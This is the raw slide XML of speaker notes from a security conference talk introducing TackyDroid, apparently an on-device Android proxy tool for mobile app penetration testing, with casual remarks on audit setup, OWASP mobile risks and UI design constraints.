          <p:cNvPr id="232" name="Shape 23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7" name="Shape 237"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Shape 23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9" name="Shape 239"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>we know many of you know that feel too</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3" name="Shape 243"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Shape 244"/>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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and we want to provide more tools to the security industry, and create more discussions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and we are really sorry to you that you need to sit through another boring proxy talk for 50 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>we apologize …..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BUT we added some funcs that nobody else has, and you guys will truly love it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>but this talk does contains some valuable information which you will probably forget after you leave this room</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Shape 24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9" name="Shape 249"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Shape 250"/>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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OK, 90%, who can tell me what this is</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Shape 25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5" name="Shape 255"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Shape 256"/>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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>//I am 90% sure that random stats make presentations better.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>But seriously throughout most of our experiences we find that 90% of actually auditing applications is the setup time to only end up finding boring information leakage vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> pause a bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sorry i lied, it’s probably more like 70% of the total time but this is just to let you know that we normally run into problems like that</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Shape 25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1" name="Shape 261"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Shape 262"/>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CHRIS 10 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Simply put, the environment we are in is very special, thats all we can say about it. and even if you have MDM the setup might not be so straight forward. Also since when we do pentest we aways targets the STG environment so we dont break stuff, so our setup would have to be, android connects to desktop, then desktop connects to STG. but if you use tacky, which is basically a proxy inside the droid, you can cut down the middle man. also there’s the chance where you might have an app which connects to different stg envirinmtns because it’s calling web apis made from different teams. Also theres the projects where the app is developed from a 3rd party</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>this could go on and on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Shape 26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8" name="Shape 268"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Shape 269"/>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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>so since you need to connect to a desktop then to a stg or where ever, you eventually have to sit in front of a desktop whole day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and mobile prj doesnt feel that mobile anymore</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Shape 27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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SO! This is today’s agenda. We will start with a quick background, kind of, to let you guys know who we are. After that we would like to play a game called “spot the hacker”. Then we will get into today’s topic, which is Tackydroid, and what is it about. We will briefly talk about why and how we made it, along with some introductions to the features of TackyDroid. Then we will show you some Demo just to prove to you that our spaghetti code really works. Lastly we will share with you about our future work, which is going to be a long ass list because we are really slow in coding. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 10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4" name="Shape 274"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Shape 275"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>just read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- client side code is the android application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Shape 27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0" name="Shape 280"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Shape 281"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Oh great the owasp top 10 , which rearranges itself every year…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>mention that the black ones are the server vulns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Expand on session management </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Shape 28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6" name="Shape 286"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Many of you already know what these vulnerabiities are, and we just want to higlight that it all requires some sort of web api access , and this is really want you want to focus on when you have a internet facing application cause this is where you will find the bulk of your vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Shape 28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2" name="Shape 292"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Shape 293"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- I don’t feel good about myself when I have to report these or see them in a vendor report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- Sure there is some juicy stuff with intents but </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Shape 29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8" name="Shape 298"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Shape 299"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4343400" x="685800"/>
            <a:ext cy="4114800" cx="5486399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 30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4" name="Shape 304"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Shape 305"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>but of course mobile vulns are not only about information leakage you can have really cool remote vulnerabilities such as the ones found in mozilla firefox or google chrome. So in my experience the majority of apps that we come across or look at it is very rare to find these types of vulnerabiltieies because they are internet facinb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Shape 30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0" name="Shape 310"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Shape 311"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>So unless you’re hacking like this guy all your information vulns are not leet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Shape 31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6" name="Shape 316"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Shape 317"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>read through it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- so everyone enough bullshit, i know you are dying to hear about tacky droid, or at least dying to fall back alseep</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Shape 31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2" name="Shape 322"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>read through it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Shape 32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8" name="Shape 328"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Shape 329"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Shape 33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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OK! now our background</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Shape 11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4" name="Shape 334"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Shape 335"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-port upgraded just can’t be done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- It would be really annoying for the user to constantly change between activities when auditing an application, or having constant popups so we have to come up with a way that our UI wouldn’t interfere or take away from the user experience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- So unless you have a 12 inch table you know that screenspace is an issue for an application of this type, so the biggest problem was how do we scale everything so it fits on not only tablets but even phones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- mobile keyboards are a pain, small, difficult to type with punctuation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>can you imagine typing in a super long SQL injection sequence in on your phone? or even trying to do XSS ? it would take me at least a minute or two.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- Tablet keyboards are a bit better but still have to switch between special keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- we found we couldn’t fit everything we wanted on the screen so we had to make some sacrificies(lots of )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Shape 33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0" name="Shape 340"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Shape 341"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
